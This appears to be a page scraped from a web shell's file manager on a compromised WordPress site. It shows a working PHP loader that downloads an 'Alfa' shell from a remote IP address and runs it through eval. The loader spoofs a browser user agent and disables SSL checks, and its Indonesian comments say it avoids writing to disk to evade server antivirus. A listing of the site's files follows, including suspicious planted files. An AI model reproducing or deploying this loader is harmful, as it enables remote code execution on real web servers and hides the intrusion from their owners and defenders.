PATH:
home
/
shotlining
/
public_html
<?php // --- Konfigurasi --- $url = 'http://185.128.227.157/ALL-SHELL/raw-ker/alfa.txt'; $timeout = 20; // --- Ambil konten via cURL --- $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // Pakai User Agent Browser asli agar tidak diblokir LiteSpeed curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'); $body = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($body === false || $http_code !== 200) { http_response_code(502); exit("Gagal mengambil data. Code: {$http_code}"); } // Bersihkan BOM if (substr($body, 0, 3) === "\xEF\xBB\xBF") { $body = substr($body, 3); } // Eksekusi if (preg_match('/<\?php/i', $body)) { // Jalankan tanpa simpan file (menghindari deteksi antivirus server) eval('?>' . $body); } else { header('Content-Type: text/plain'); echo $body; }
[-] wp-signup.php
[edit]
[+]
wp-includes
[-] wp-comments-post.php
[edit]
[-] wp-settings.php
[edit]
[+]
.tmb
[-] wp-mail.php
[edit]
[-] license.txt
[edit]
[-] index.php0
[edit]
[+]
wp-content
[-] readme.html
[edit]
[+]
..
[-] error_log
[edit]
[-] wp-cron.php
[edit]
[-] wp-activate.php
[edit]
[-] ss.php
[edit]
[-] wp-blog-header.php
[edit]
[-] wp-config-sample.php
[edit]
[-] xmlrpc.php
[edit]
[-] wp-links-opml.php
[edit]
[+]
about
[-] .htaccess
[edit]
[-] gallery-offset-system-patrens.php
[edit]
[-] vpx.txt
[edit]
[+]
b11285
[-] wp-load.php
[edit]
[-] .htaccess.bk
[edit]
[-] wp-trackback.php
[edit]
[+]
wp-admin
[+]
76c47
[-] google07ee44859fb96955.html
[edit]
[-] wp-config.php
[edit]
[-] robots.txt
[edit]